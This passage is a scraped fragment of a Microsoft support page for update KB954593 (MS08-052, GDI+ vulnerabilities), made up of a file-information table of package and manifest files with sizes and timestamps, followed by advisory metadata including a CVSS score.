class=\"sbody-td\">1,425</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,444</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_0_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_0~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,424</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,443</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,381</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.18065_none_9e7abe2ec9c13222.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">11:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.22170_none_87ae89a0e3672b5a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.18065_none_8dcc2d1362c70bc9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">11:31</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.22170_none_76fff8857c6d0501.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div></div></body></html>", "edition": 2, "modified": "2020-10-20T07:12:22", "id": "KB954593", "href": "https://support.microsoft.com/en-us/help/954593/", "published": "2020-10-20T07:12:22", "title": "KB954593 - MS08-052: Vulnerabilities in GDI+ could allow remote code execution", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}